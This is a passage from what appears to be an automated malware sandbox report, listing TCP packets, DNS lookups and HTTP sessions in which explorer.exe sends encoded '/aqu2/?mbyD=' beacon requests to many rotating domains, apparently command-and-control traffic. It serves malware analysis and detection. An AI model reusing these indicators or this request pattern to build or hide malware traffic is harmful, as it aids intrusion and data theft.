                                                                        Apr 8, 2021 10:49:05.732119083 CEST | 80 | 49742 | 135.181.58.27 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:05.732193947 CEST | 80 | 49742 | 135.181.58.27 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:05.732331991 CEST | 49742 | 80 | 192.168.2.4 | 135.181.58.27
                                                                        Apr 8, 2021 10:49:05.732392073 CEST | 49742 | 80 | 192.168.2.4 | 135.181.58.27
                                                                        Apr 8, 2021 10:49:05.780396938 CEST | 80 | 49742 | 135.181.58.27 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:10.809366941 CEST | 49743 | 80 | 192.168.2.4 | 64.32.22.102
                                                                        Apr 8, 2021 10:49:10.974342108 CEST | 80 | 49743 | 64.32.22.102 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:10.974803925 CEST | 49743 | 80 | 192.168.2.4 | 64.32.22.102
                                                                        Apr 8, 2021 10:49:10.974932909 CEST | 49743 | 80 | 192.168.2.4 | 64.32.22.102
                                                                        Apr 8, 2021 10:49:11.139417887 CEST | 80 | 49743 | 64.32.22.102 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139461040 CEST | 80 | 49743 | 64.32.22.102 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139472008 CEST | 80 | 49743 | 64.32.22.102 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139687061 CEST | 49743 | 80 | 192.168.2.4 | 64.32.22.102
                                                                        Apr 8, 2021 10:49:11.139733076 CEST | 49743 | 80 | 192.168.2.4 | 64.32.22.102
                                                                        Apr 8, 2021 10:49:11.303935051 CEST | 80 | 49743 | 64.32.22.102 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:16.194564104 CEST | 49755 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        Apr 8, 2021 10:49:16.206888914 CEST | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:16.206983089 CEST | 49755 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        Apr 8, 2021 10:49:16.207128048 CEST | 49755 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        Apr 8, 2021 10:49:16.219321012 CEST | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320554018 CEST | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320580006 CEST | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320749998 CEST | 49755 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        Apr 8, 2021 10:49:16.320787907 CEST | 49755 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        Apr 8, 2021 10:49:16.333220959 CEST | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.382102966 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.404936075 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.405776978 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.406011105 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.429078102 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577060938 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577083111 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577095985 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577105999 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577236891 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577260017 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577271938 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577286005 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577311993 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577328920 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577351093 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577356100 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577362061 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577368975 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577405930 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577411890 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577414989 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577418089 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577435970 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577450037 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577464104 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577490091 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577559948 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577570915 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577574015 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577575922 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577599049 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577616930 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577785969 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.577841043 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.600424051 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600462914 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600488901 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600512028 CEST | 80 | 49758 | 64.190.62.111 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600524902 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:21.600547075 CEST | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        Apr 8, 2021 10:49:26.644073009 CEST | 49759 | 80 | 192.168.2.4 | 185.230.60.177
                                                                        Apr 8, 2021 10:49:26.759862900 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.760004044 CEST | 49759 | 80 | 192.168.2.4 | 185.230.60.177
                                                                        Apr 8, 2021 10:49:26.760282993 CEST | 49759 | 80 | 192.168.2.4 | 185.230.60.177
                                                                        Apr 8, 2021 10:49:26.876003981 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951628923 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951685905 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951740026 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951775074 CEST | 80 | 49759 | 185.230.60.177 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951783895 CEST | 49759 | 80 | 192.168.2.4 | 185.230.60.177

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 10:48:49.567555904 CEST | 192.168.2.4 | 8.8.8.8 | 0x9152 | Standard query (0) | www.biehnrecords.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:48:54.964912891 CEST | 192.168.2.4 | 8.8.8.8 | 0x245 | Standard query (0) | www.bedpee.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:00.324605942 CEST | 192.168.2.4 | 8.8.8.8 | 0xf223 | Standard query (0) | www.stone-master.info | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:05.580651999 CEST | 192.168.2.4 | 8.8.8.8 | 0x782f | Standard query (0) | www.pmrack.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.748123884 CEST | 192.168.2.4 | 8.8.8.8 | 0x5a5c | Standard query (0) | www.serversexposed.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:16.159521103 CEST | 192.168.2.4 | 8.8.8.8 | 0xb5c9 | Standard query (0) | www.heliumhubs.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:21.347358942 CEST | 192.168.2.4 | 8.8.8.8 | 0x793f | Standard query (0) | www.420vaca.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:26.593446970 CEST | 192.168.2.4 | 8.8.8.8 | 0x7985 | Standard query (0) | www.shujahumayun.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:31.968797922 CEST | 192.168.2.4 | 8.8.8.8 | 0x2066 | Standard query (0) | www.dottproject.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:37.136812925 CEST | 192.168.2.4 | 8.8.8.8 | 0xd1cc | Standard query (0) | www.qcmax.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:43.143384933 CEST | 192.168.2.4 | 8.8.8.8 | 0xb0a5 | Standard query (0) | www.playfulpainters.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:48.334547997 CEST | 192.168.2.4 | 8.8.8.8 | 0x3e76 | Standard query (0) | www.autobrehna.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:53.462363005 CEST | 192.168.2.4 | 8.8.8.8 | 0x150f | Standard query (0) | www.nagoyadoori.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:59.069574118 CEST | 192.168.2.4 | 8.8.8.8 | 0xbcda | Standard query (0) | www.appgusher.com | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.582552910 CEST | 192.168.2.4 | 8.8.8.8 | 0x6686 | Standard query (0) | www.thesixteenthround.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 10:48:49.587600946 CEST | 8.8.8.8 | 192.168.2.4 | 0x9152 | No error (0) | www.biehnrecords.com | biehnrecords.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:48:49.587600946 CEST | 8.8.8.8 | 192.168.2.4 | 0x9152 | No error (0) | biehnrecords.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:48:54.987523079 CEST | 8.8.8.8 | 192.168.2.4 | 0x245 | No error (0) | www.bedpee.com | | 13.248.216.40 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:48:54.987523079 CEST | 8.8.8.8 | 192.168.2.4 | 0x245 | No error (0) | www.bedpee.com | | 76.223.65.111 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:00.554574013 CEST | 8.8.8.8 | 192.168.2.4 | 0xf223 | Name error (3) | www.stone-master.info | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:05.622571945 CEST | 8.8.8.8 | 192.168.2.4 | 0x782f | No error (0) | www.pmrack.com | pmrack.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:05.622571945 CEST | 8.8.8.8 | 192.168.2.4 | 0x782f | No error (0) | pmrack.com | | 135.181.58.27 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | www.serversexposed.com | parking.namesilo.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 64.32.22.102 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 198.251.81.30 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 45.58.190.82 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 107.161.23.204 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 192.161.187.200 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 168.235.88.209 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 70.39.125.244 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 188.164.131.200 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 198.251.84.92 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 204.188.203.155 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST | 8.8.8.8 | 192.168.2.4 | 0x5a5c | No error (0) | parking.namesilo.com | | 209.141.38.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:16.193547010 CEST | 8.8.8.8 | 192.168.2.4 | 0xb5c9 | No error (0) | www.heliumhubs.com | heliumhubs.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:16.193547010 CEST | 8.8.8.8 | 192.168.2.4 | 0xb5c9 | No error (0) | heliumhubs.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:21.378154039 CEST | 8.8.8.8 | 192.168.2.4 | 0x793f | No error (0) | www.420vaca.com | | 64.190.62.111 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST | 8.8.8.8 | 192.168.2.4 | 0x7985 | No error (0) | www.shujahumayun.com | www135.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST | 8.8.8.8 | 192.168.2.4 | 0x7985 | No error (0) | www135.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST | 8.8.8.8 | 192.168.2.4 | 0x7985 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST | 8.8.8.8 | 192.168.2.4 | 0x7985 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-dc11-60-177.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST | 8.8.8.8 | 192.168.2.4 | 0x7985 | No error (0) | td-balancer-dc11-60-177.wixdns.net | | 185.230.60.177 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:32.013699055 CEST | 8.8.8.8 | 192.168.2.4 | 0x2066 | No error (0) | www.dottproject.com | | 91.195.240.94 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:37.457993031 CEST | 8.8.8.8 | 192.168.2.4 | 0xd1cc | No error (0) | www.qcmax.com | | 104.128.125.95 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:43.182207108 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0a5 | No error (0) | www.playfulpainters.com | playfulpainters.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:49:43.182207108 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0a5 | No error (0) | playfulpainters.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:48.366859913 CEST | 8.8.8.8 | 192.168.2.4 | 0x3e76 | No error (0) | www.autobrehna.com | | 62.116.130.8 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:53.884182930 CEST | 8.8.8.8 | 192.168.2.4 | 0x150f | Name error (3) | www.nagoyadoori.xyz | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 10:49:59.359829903 CEST | 8.8.8.8 | 192.168.2.4 | 0xbcda | No error (0) | www.appgusher.com | | 156.254.221.72 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | www.thesixteenthround.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST | 8.8.8.8 | 192.168.2.4 | 0x6686 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.biehnrecords.com
• www.bedpee.com
• www.pmrack.com
• www.serversexposed.com
• www.heliumhubs.com
• www.420vaca.com
• www.shujahumayun.com
• www.dottproject.com
• www.qcmax.com
• www.playfulpainters.com
• www.autobrehna.com
• www.appgusher.com
• www.thesixteenthround.net

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449734184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:48:49.778557062 CEST1389OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1
                                                                        Host: www.biehnrecords.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:48:49.956664085 CEST1389INHTTP/1.1 502 Bad Gateway
                                                                        Server: nginx/1.16.1
                                                                        Date: Thu, 08 Apr 2021 08:48:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        1 | 192.168.2.4 | 49737 | 13.248.216.40 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:48:55.129555941 CEST | 1438 | OUT | GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.bedpee.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:48:55.307358027 CEST | 1438 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: awselb/2.0
                                                                        Date: Thu, 08 Apr 2021 08:48:55 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 118
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        10 | 192.168.2.4 | 49770 | 62.116.130.8 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:48.392472029 CEST | 6753 | OUT | GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.autobrehna.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:48.428760052 CEST | 6754 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 08:49:48 GMT
                                                                        Server: Apache
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        X-Varnish: 494633303
                                                                        Age: 0
                                                                        X-redirector: MTk4MzEyMjYK
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 160
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 72 6f 64 75 6b 74 65 2e 77 65 62 2e 64 65 2f 68 6f 6d 65 70 61 67 65 2d 75 6e 64 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://produkte.web.de/homepage-und-mail/homepage-parken/"></frameset></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        11 | 192.168.2.4 | 49773 | 156.254.221.72 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:50:00.378705978 CEST | 6782 | OUT | GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.appgusher.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:50:00.575277090 CEST | 6783 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 08:50:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        12 | 192.168.2.4 | 49777 | 198.54.117.215 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:50:05.817534924 CEST | 6822 | OUT | GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1
                                                                        Host: www.thesixteenthround.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        2 | 192.168.2.4 | 49742 | 135.181.58.27 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:05.675004959 CEST | 5711 | OUT | GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.pmrack.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:05.732119083 CEST | 5711 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 08:49:05 GMT
                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
